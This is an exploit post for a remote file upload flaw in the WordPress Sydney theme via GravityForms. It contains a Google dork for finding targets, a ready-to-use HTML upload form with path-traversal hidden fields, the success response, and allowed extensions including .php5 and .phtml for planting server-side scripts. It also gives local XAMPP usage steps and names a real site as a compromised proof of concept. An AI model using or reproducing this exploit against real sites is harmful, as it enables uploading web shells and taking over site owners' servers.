#################################################################################################
# Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 08/06/2018
# Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
#################################################################################################
# Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.''
# Exploit HTML Code :
<title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title>
<form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data">
<body background=" ">
<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type=hidden">
<input name="name" value="kingskrupellos.html" type=''hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">
</form>
Exploit : TARGET/?gf_page=upload
We cannot upload directly with this exploit. But we can upload our file to the site with remote file exploiter.
# Error : {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}}
# Error [ Successful ] : {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}}
# Allowed File Extensions : .html .htm .php5 .txt .jpg .gif .png .html.fla .phtml .pdf
# You don't need to change your filename as _input__kingskrupellos.php5 like this.
# Just choose a file from your machine and upload it with the beforementioned extensions.
# For example : yourfilename.php file will upload to the server [ site ] like this. /_input__kingskrupellos.php5
# Example Usage for Windows :
# Use with XAMPP Control Panel and your Localhost.
# Use from htdocs folder located in XAMPP
# 127.0.0.1/athemeswordpressexploiter.html
# Path : TARGET/_input__kingskrupellos.php5
#################################################################################################
# Example Site => miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ]
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################